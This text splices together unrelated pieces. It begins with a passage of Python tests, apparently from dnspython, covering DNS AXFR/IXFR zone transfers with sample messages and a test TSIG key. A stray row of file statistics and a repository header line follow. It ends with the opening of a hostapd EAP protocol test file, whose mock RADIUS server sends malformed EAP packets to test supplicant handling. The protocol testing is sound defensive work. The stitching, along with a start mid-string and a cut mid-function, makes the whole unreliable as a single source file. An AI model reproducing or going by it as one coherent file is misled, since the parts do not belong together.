ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
unexpected_end_ixfr_2 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 1 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
'''
bad_serial_ixfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 4 2 3 4 5
@ 3600 IN SOA foo bar 2 2 3 4 5
bar.foo 300 IN MX 0 blaz.foo
ns2 3600 IN A 10.0.0.2
@ 3600 IN NS ns2
@ 3600 IN SOA foo bar 4 2 3 4 5
ns2 3600 IN A 10.0.0.4
ns3 3600 IN A 10.0.0.3
@ 3600 IN SOA foo bar 4 2 3 4 5
'''
ixfr_axfr = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
'''
def test_basic_axfr():
z = dns.versioned.Zone('example.')
m = dns.message.from_text(axfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_basic_axfr_unversioned():
z = dns.zone.Zone('example.')
m = dns.message.from_text(axfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_basic_axfr_two_parts():
z = dns.versioned.Zone('example.')
m1 = dns.message.from_text(axfr1, origin=z.origin,
one_rr_per_rrset=True)
m2 = dns.message.from_text(axfr2, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
done = xfr.process_message(m1)
assert not done
done = xfr.process_message(m2)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_axfr_unexpected_origin():
z = dns.versioned.Zone('example.')
m = dns.message.from_text(axfr_unexpected_origin, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_basic_ixfr():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_basic_ixfr_unversioned():
z = dns.zone.from_text(base, 'example.')
m = dns.message.from_text(ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_compressed_ixfr():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(compressed_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_basic_ixfr_many_parts():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = False
for text in ixfrs:
assert not done
m = dns.message.from_text(text, origin=z.origin,
one_rr_per_rrset=True)
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_good_empty_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(good_empty_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(ixfr_expected, 'example.')
assert z == ez
def test_retry_tcp_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(retry_tcp_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1, is_udp=True) as xfr:
with pytest.raises(dns.xfr.UseTCP):
xfr.process_message(m)
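# RFC 1995 behavior exercised above: over UDP a server whose diff does not
# fit may answer with just its current SOA. Its serial (5) is newer than
# the zone's (4), so the Inbound parser raises UseTCP to make the caller
# retry the transfer over TCP.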
def test_bad_empty_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_empty_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=3) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_serial_went_backwards_ixfr():
z = dns.zone.from_text(ixfr_expected, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_empty_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=5) as xfr:
with pytest.raises(dns.xfr.SerialWentBackwards):
xfr.process_message(m)
def test_ixfr_is_axfr():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(ixfr_axfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=0xffffffff) as xfr:
done = xfr.process_message(m)
assert done
ez = dns.zone.from_text(base, 'example.')
assert z == ez
def test_ixfr_requires_serial():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
with pytest.raises(ValueError):
dns.xfr.Inbound(z, dns.rdatatype.IXFR)
def test_ixfr_unexpected_end_bad_diff_sequence():
# This is where we get the end serial, but haven't seen all of
# the expected diffs
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(unexpected_end_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_udp_ixfr_unexpected_end_just_stops():
# This is where everything looks good, but the IXFR just stops
# in the middle.
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(unexpected_end_ixfr_2, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1, is_udp=True) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_ixfr_bad_serial():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_serial_ixfr, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_no_udp_with_axfr():
z = dns.versioned.Zone('example.')
with pytest.raises(ValueError):
with dns.xfr.Inbound(z, dns.rdatatype.AXFR, is_udp=True) as xfr:
pass
refused = '''id 1
opcode QUERY
rcode REFUSED
flags AA
;QUESTION
example. IN AXFR
'''
bad_qname = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
not-example. IN IXFR
'''
bad_qtype = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
'''
soa_not_first = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
bar.foo 300 IN MX 0 blaz.foo
'''
soa_not_first_2 = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ANSWER
@ 300 IN MX 0 blaz.foo
'''
no_answer = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN IXFR
;ADDITIONAL
bar.foo 300 IN MX 0 blaz.foo
'''
axfr_answers_after_final_soa = '''id 1
opcode QUERY
rcode NOERROR
flags AA
;QUESTION
example. IN AXFR
;ANSWER
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
@ 3600 IN SOA foo bar 1 2 3 4 5
ns3 3600 IN A 10.0.0.3
'''
def test_refused():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(refused, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.xfr.TransferError):
xfr.process_message(m)
def test_bad_qname():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_qname, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_bad_qtype():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(bad_qtype, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_soa_not_first():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(soa_not_first, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
m = dns.message.from_text(soa_not_first_2, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_no_answer():
z = dns.zone.from_text(base, 'example.',
zone_factory=dns.versioned.Zone)
m = dns.message.from_text(no_answer, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.IXFR, serial=1) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
def test_axfr_answers_after_final_soa():
z = dns.versioned.Zone('example.')
m = dns.message.from_text(axfr_answers_after_final_soa, origin=z.origin,
one_rr_per_rrset=True)
with dns.xfr.Inbound(z, dns.rdatatype.AXFR) as xfr:
with pytest.raises(dns.exception.FormError):
xfr.process_message(m)
keyring = dns.tsigkeyring.from_text(
{
'keyname.': 'NjHwPsMKjdN++dOfE5iAiQ=='
}
)
keyname = dns.name.from_text('keyname')
def test_make_query_basic():
z = dns.versioned.Zone('example.')
(q, s) = dns.xfr.make_query(z)
assert q.question[0].rdtype == dns.rdatatype.AXFR
assert s is None
(q, s) = dns.xfr.make_query(z, serial=None)
assert q.question[0].rdtype == dns.rdatatype.AXFR
assert s is None
(q, s) = dns.xfr.make_query(z, serial=10)
assert q.question[0].rdtype == dns.rdatatype.IXFR
assert q.authority[0].rdtype == dns.rdatatype.SOA
assert q.authority[0][0].serial == 10
assert s == 10
with z.writer() as txn:
txn.add('@', 300, dns.rdata.from_text('in', 'soa', '. . 1 2 3 4 5'))
(q, s) = dns.xfr.make_query(z)
assert q.question[0].rdtype == dns.rdatatype.IXFR
assert q.authority[0].rdtype == dns.rdatatype.SOA
assert q.authority[0][0].serial == 1
assert s == 1
(q, s) = dns.xfr.make_query(z, keyring=keyring, keyname=keyname)
assert q.question[0].rdtype == dns.rdatatype.IXFR
assert q.authority[0].rdtype == dns.rdatatype.SOA
assert q.authority[0][0].serial == 1
assert s == 1
assert q.keyname == keyname
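# Behavior exercised above: make_query() falls back to AXFR while the zone
# has no SOA, and switches to IXFR once one exists, placing the zone's
# current SOA in the authority section (per RFC 1995) so the server learns
# the client's serial.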
def test_make_query_bad_serial():
z = dns.versioned.Zone('example.')
with pytest.raises(ValueError):
dns.xfr.make_query(z, serial='hi')
with pytest.raises(ValueError):
dns.xfr.make_query(z, serial=-1)
with pytest.raises(ValueError):
dns.xfr.make_query(z, serial=4294967296)
def test_extract_serial_from_query():
z = dns.versioned.Zone('example.')
(q, s) = dns.xfr.make_query(z)
xs = dns.xfr.extract_serial_from_query(q)
assert s is None
assert s == xs
(q, s) = dns.xfr.make_query(z, serial=10)
xs = dns.xfr.extract_serial_from_query(q)
assert s == 10
assert s == xs
q = dns.message.make_query('example', 'a')
with pytest.raises(ValueError):
dns.xfr.extract_serial_from_query(q)
class XFRNanoNameserver(Server):
def __init__(self):
super().__init__(origin=dns.name.from_text('example'))
def handle(self, request):
try:
if request.message.question[0].rdtype == dns.rdatatype.IXFR:
text = ixfr
else:
text = axfr
r = dns.message.from_text(text, one_rr_per_rrset=True,
origin=self.origin)
r.id = request.message.id
return r
except Exception:
pass
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_sync_inbound_xfr():
with XFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
async def async_inbound_xfr():
with XFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_asyncio_inbound_xfr():
dns.asyncbackend.set_default_backend('asyncio')
async def run():
await async_inbound_xfr()
try:
runner = asyncio.run
except AttributeError:
# this is only needed for 3.6
def old_runner(awaitable):
loop = asyncio.get_event_loop()
return loop.run_until_complete(awaitable)
runner = old_runner
runner(run())
#
# We don't need to do this as it's all generic code, but
# just for extra caution we do it for each backend.
#
try:
import trio
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_trio_inbound_xfr():
dns.asyncbackend.set_default_backend('trio')
async def run():
await async_inbound_xfr()
trio.run(run)
except ImportError:
pass
try:
import curio
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_curio_inbound_xfr():
dns.asyncbackend.set_default_backend('curio')
async def run():
await async_inbound_xfr()
curio.run(run)
except ImportError:
pass
class UDPXFRNanoNameserver(Server):
def __init__(self):
super().__init__(origin=dns.name.from_text('example'))
self.did_truncation = False
def handle(self, request):
try:
if request.message.question[0].rdtype == dns.rdatatype.IXFR:
if self.did_truncation:
text = ixfr
else:
text = retry_tcp_ixfr
self.did_truncation = True
else:
text = axfr
r = dns.message.from_text(text, one_rr_per_rrset=True,
origin=self.origin)
r.id = request.message.id
return r
except Exception:
pass
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_sync_retry_tcp_inbound_xfr():
with UDPXFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
dns.query.inbound_xfr(ns.tcp_address[0], zone, port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
async def udp_async_inbound_xfr():
with UDPXFRNanoNameserver() as ns:
zone = dns.versioned.Zone('example')
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
await dns.asyncquery.inbound_xfr(ns.tcp_address[0], zone,
port=ns.tcp_address[1],
udp_mode=dns.query.UDPMode.TRY_FIRST)
expected = dns.zone.from_text(ixfr_expected, 'example')
assert zone == expected
@pytest.mark.skipif(not _nanonameserver_available,
reason="requires nanonameserver")
def test_asyncio_retry_tcp_inbound_xfr():
dns.asyncbackend.set_default_backend('asyncio')
async def run():
await udp_async_inbound_xfr()
try:
runner = asyncio.run
except AttributeError:
def old_runner(awaitable):
loop = asyncio.get_event_loop()
return loop.run_until_complete(awaitable)
runner = old_runner
runner(run())
| 29.892583 | 78 | 0.62731 | 3,636 | 23,376 | 3.893839 | 0.063806 | 0.039412 | 0.009959 | 0.038989 | 0.862692 | 0.844823 | 0.83783 | 0.811343 | 0.799972 | 0.775251 | 0 | 0.057048 | 0.268866 | 23,376 | 781 | 79 | 29.930858 | 0.771342 | 0.021603 | 0 | 0.782609 | 0 | 0 | 0.219976 | 0.00105 | 0 | 0 | 0.000438 | 0 | 0.065217 | 1 | 0.056522 | false | 0.008696 | 0.021739 | 0 | 0.088406 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
46703f7c204c151f1d8f2f846b41046221aa922f | 370,854 | py | Python | tests/hwsim/test_eap_proto.py | yoavst/hostapd-atrik | 92faf1451d22064686b44bfb9ca94f90deb46197 | [
"Unlicense"
] | 1 | 2021-09-02T17:23:10.000Z | 2021-09-02T17:23:10.000Z | tests/hwsim/test_eap_proto.py | yoavst/hostapd-atrik | 92faf1451d22064686b44bfb9ca94f90deb46197 | [
"Unlicense"
] | null | null | null | tests/hwsim/test_eap_proto.py | yoavst/hostapd-atrik | 92faf1451d22064686b44bfb9ca94f90deb46197 | [
"Unlicense"
] | null | null | null | # EAP protocol tests
# Copyright (c) 2014-2015, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import threading
import time
import hostapd
from utils import HwsimSkip, alloc_fail, fail_test, wait_fail_trigger
from test_ap_eap import check_eap_capa, check_hlr_auc_gw_support, int_eap_server_params
from test_erp import check_erp_capa
try:
import OpenSSL
openssl_imported = True
except ImportError:
openssl_imported = False
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
EAP_CODE_INITIATE = 5
EAP_CODE_FINISH = 6
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53
EAP_TYPE_EXPANDED = 254
# Type field in EAP-Initiate and EAP-Finish messages
EAP_ERP_TYPE_REAUTH_START = 1
EAP_ERP_TYPE_REAUTH = 2
EAP_ERP_TLV_KEYNAME_NAI = 1
EAP_ERP_TV_RRK_LIFETIME = 2
EAP_ERP_TV_RMSK_LIFETIME = 3
EAP_ERP_TLV_DOMAIN_NAME = 4
EAP_ERP_TLV_CRYPTOSUITES = 5
EAP_ERP_TLV_AUTHORIZATION_INDICATION = 6
EAP_ERP_TLV_CALLED_STATION_ID = 128
EAP_ERP_TLV_CALLING_STATION_ID = 129
EAP_ERP_TLV_NAS_IDENTIFIER = 130
EAP_ERP_TLV_NAS_IP_ADDRESS = 131
EAP_ERP_TLV_NAS_IPV6_ADDRESS = 132
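# For reference (RFC 3748): every EAP packet built below starts with
#   Code (1 octet) | Identifier (1 octet) | Length (2 octets, big endian)
# and Request/Response packets continue with a Type octet plus
# type-specific data, hence the ">BBH..." struct.pack() patterns.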
def run_pyrad_server(srv, t_stop, eap_handler):
srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
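# RADIUS attribute 79 is EAP-Message; reassemble the (possibly
# fragmented) EAP packet by concatenating all of its instances.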
eap = ""
for p in pkt[79]:
eap += p
eap_req = self.eap_handler(self.ctx, eap)
reply = self.CreateReplyPacket(pkt)
if eap_req:
while True:
if len(eap_req) > 253:
reply.AddAttribute("EAP-Message", eap_req[0:253])
eap_req = eap_req[253:]
else:
reply.AddAttribute("EAP-Message", eap_req)
break
else:
logger.info("No EAP request available")
reply.code = pyrad.packet.AccessChallenge
hmac_obj = hmac.new(reply.secret)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# Zero-fill the Message-Authenticator attribute (RFC 2869) before
# encoding, so the HMAC-MD5 is computed over a zeroed placeholder
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# RADIUS Length field: 4-octet header + 16-octet authenticator + attributes
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_stop, eap_handler):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_stop = t_stop
self.eap_handler = eap_handler
self.ctx = {}
while not t_stop.is_set():
for (fd, event) in self._poll.poll(200):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_stop = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
t.start()
return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
srv['stop'].set()
srv['thread'].join()
def start_ap(ap):
params = hostapd.wpa2_eap_params(ssid="eap-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(ap, params)
return hapd
def test_eap_proto(dev, apdev):
"""EAP protocol tests"""
check_eap_capa(dev[0], "MD5")
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
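# EAP-MD5 request payload (RFC 3748 section 5.4): Value-Size (1 octet,
# here 1), the challenge value itself (0xaa), and a trailing Name ('n').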
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 2")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 3")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('B'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('C'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('D'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('E'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request (same id)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('F'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
raise Exception("Unexpected notification contents: " + ev)
